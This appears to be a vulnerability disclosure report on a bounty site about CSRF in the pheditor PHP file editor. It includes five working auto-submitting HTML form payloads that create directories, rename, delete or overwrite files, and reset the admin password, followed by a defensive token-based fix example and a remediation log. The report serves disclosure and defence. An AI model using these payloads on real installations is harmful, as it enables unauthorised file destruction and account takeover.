Cross-Site Request Forgery (CSRF) in pheditor/pheditor

Valid

Reported on

Sep 14th 2021


Description

Cross-Site Request Forgery (CSRF) is an attack that forces an end user to execute unwanted actions on a web application in which they’re currently authenticated. With a little help of social engineering (such as sending a link via email or chat), an attacker may trick the users of a web application into executing actions of the attacker’s choosing. If the victim is a normal user, a successful CSRF attack can force the user to perform state changing requests like transferring funds, changing their email address, and so forth. If the victim is an administrative account, CSRF can compromise the entire web application.

https://github.com/pheditor/pheditor/ is vulnerable to CSRF as shown below:

Impact

The vulnerability allows an attacker to execute actions on the server that is running the application, and typically to fully compromise the application and all its data.

Occurrences

CSRF Make dir

Log in to pheditor, then create a new file csrf_makedir.html in any location with the following content:

<html>
    <body onload="document.forms[0].submit()">
    <form enctype="application/x-www-form-urlencoded" method="POST" action="http://localhost/pheditor-2/pheditor.php">
        <table>
            <tr><td>action</td><td><input type="text" value="make-dir" name="action"></td></tr>
            <tr><td>dir</td><td><input type="text" value="/csrf-new-dir" name="dir"></td></tr>
        </table>
        <input type="submit" value="http://localhost/pheditor-2/pheditor.php">
    </form>
    </body>
</html>

Open csrf_makedir.html in a browser and observe that a new directory csrf-new-dir has been created.

CSRF Rename file

Log in to pheditor, then create a new file csrf_rename.html in any location with the following content:

<html>
    <body onload="document.forms[0].submit()">
    <form enctype="application/x-www-form-urlencoded" method="POST" action="http://localhost/pheditor-2/pheditor.php">
        <table>
            <tr><td>action</td><td><input type="text" value="rename" name="action"></td></tr>
            <tr><td>path</td><td><input type="text" value="/composer.json" name="path"></td></tr>
            <tr><td>name</td><td><input type="text" value="renamed.json" name="name"></td></tr>
        </table>
        <input type="submit" value="http://localhost/pheditor-2/pheditor.php">
    </form>
    </body>
</html>

Open csrf_rename.html in a browser and observe that composer.json was renamed to renamed.json.

CSRF Password reset

Log in to pheditor, then create a new file csrf_reset.html in any location with the following content:

<html>
    <body onload="document.forms[0].submit()">
    <form enctype="application/x-www-form-urlencoded" method="POST" action="http://localhost/pheditor-2/pheditor.php">
        <table>
            <tr><td>action</td><td><input type="text" value="password" name="action"></td></tr>
            <tr><td>password</td><td><input type="text" value="test" name="password"></td></tr>
        </table>
        <input type="submit" value="http://localhost/pheditor-2/pheditor.php">
    </form>
    </body>
</html>

Open csrf_reset.html in a browser and observe that the password has been changed to test.

CSRF delete file

Log in to pheditor, then create a new file csrf_delete.html in any location with the following content:

<html>
    <body onload="document.forms[0].submit()">
    <form enctype="application/x-www-form-urlencoded" method="POST" action="http://localhost/pheditor-2/pheditor.php">
        <table>
            <tr><td>action</td><td><input type="text" value="delete" name="action"></td></tr>
            <tr><td>path</td><td><input type="text" value="/composer.json" name="path"></td></tr>
        </table>
        <input type="submit" value="http://localhost/pheditor-2/pheditor.php">
    </form>
    </body>
</html>

Open csrf_delete.html in a browser and observe that the file composer.json was removed.

CSRF Save file

Log in to pheditor, then create a new file csrf_save.html in any location with the following content:

<html>
    <body onload="document.forms[0].submit()">
    <form enctype="application/x-www-form-urlencoded" method="POST" action="http://localhost/pheditor-2/pheditor.php">
        <table>
            <tr><td>action</td><td><input type="text" value="save" name="action"></td></tr>
            <tr><td>file</td><td><input type="text" value="/composer.json" name="file"></td></tr>
            <tr><td>data</td><td><input type="text" value="CSRF TEST" name="data"></td></tr>
        </table>
        <input type="submit" value="http://localhost/pheditor-2/pheditor.php">
    </form>
    </body>
</html>

Open csrf_save.html in a browser and observe that the content of composer.json has changed.
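As an added defensive example, not pheditor's code and not the fix merged in 69a79e, the following shows how a single-file PHP editor such as pheditor.php could gate its POST action dispatch with a synchronizer token plus an Origin/Referer host check, which blocks every cross-site form post shown above; the function names csrf_token, csrf_verify and same_origin are assumptions.

```php
<?php
// Added example, not pheditor's code: synchronizer-token CSRF protection for a
// single-file editor that dispatches file operations on $_POST['action'].
session_start();
// One random token per session, embedded in every form the editor renders.
function csrf_token(): string {
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}
// Abort unless the submitted token matches the session token. A cross-site form
// cannot read the token, so it cannot include it; hash_equals() is constant-time.
function csrf_verify(): void {
    $sent = $_POST['csrf_token'] ?? '';
    $expected = $_SESSION['csrf_token'] ?? '';
    if ($expected === '' || !is_string($sent) || !hash_equals($expected, $sent)) {
        http_response_code(403);
        exit('CSRF token missing or invalid');
    }
}
// Defence in depth: browsers attach an Origin (or Referer) header naming the
// page that submitted the form, so require its host to be our own host.
function same_origin(): bool {
    $from = $_SERVER['HTTP_ORIGIN'] ?? $_SERVER['HTTP_REFERER'] ?? '';
    if ($from === '') {
        return false; // no header at all: fail closed
    }
    $fromHost = (string) parse_url($from, PHP_URL_HOST);
    $ourHost  = (string) parse_url('http://' . ($_SERVER['HTTP_HOST'] ?? ''), PHP_URL_HOST);
    return $fromHost !== '' && strcasecmp($fromHost, $ourHost) === 0;
}
// Gate every state-changing action from the report (make-dir, rename,
// password, delete, save) before any filesystem or password code runs.
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['action'])) {
    if (!same_origin()) {
        http_response_code(403);
        exit('Cross-origin request rejected');
    }
    csrf_verify();
    // ... existing dispatch on $_POST['action'] continues here ...
}
?>
<!-- Each form the editor renders carries the token as a hidden field -->
<form method="POST" action="pheditor.php">
    <input type="hidden" name="csrf_token" value="<?= htmlspecialchars(csrf_token(), ENT_QUOTES) ?>">
    <input type="hidden" name="action" value="save">
</form>
```

Setting the session cookie with SameSite=Lax (session_set_cookie_params(['samesite' => 'Lax']) on PHP 7.3+) adds a browser-side layer against the cross-site POSTs above, but it supplements the token rather than replacing it.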

Ziding Zhang
2 months ago

Admin
Hey hitisec, I've emailed the maintainers for you.

We have contacted a member of the pheditor team and are waiting to hear back 2 months ago
pheditor/pheditor maintainer validated this vulnerability 2 months ago
hitisec has been awarded the disclosure bounty
The fix bounty is now up for grabs
pheditor/pheditor maintainer confirmed that a fix has been merged on 69a79e 2 months ago
The fix bounty has been dropped
pheditor.php#L238-L256 has been validated
pheditor.php#L333-L365 has been validated
pheditor.php#L269-L286 has been validated
pheditor.php#L290-L326 has been validated
pheditor.php#L204-L232 has been validated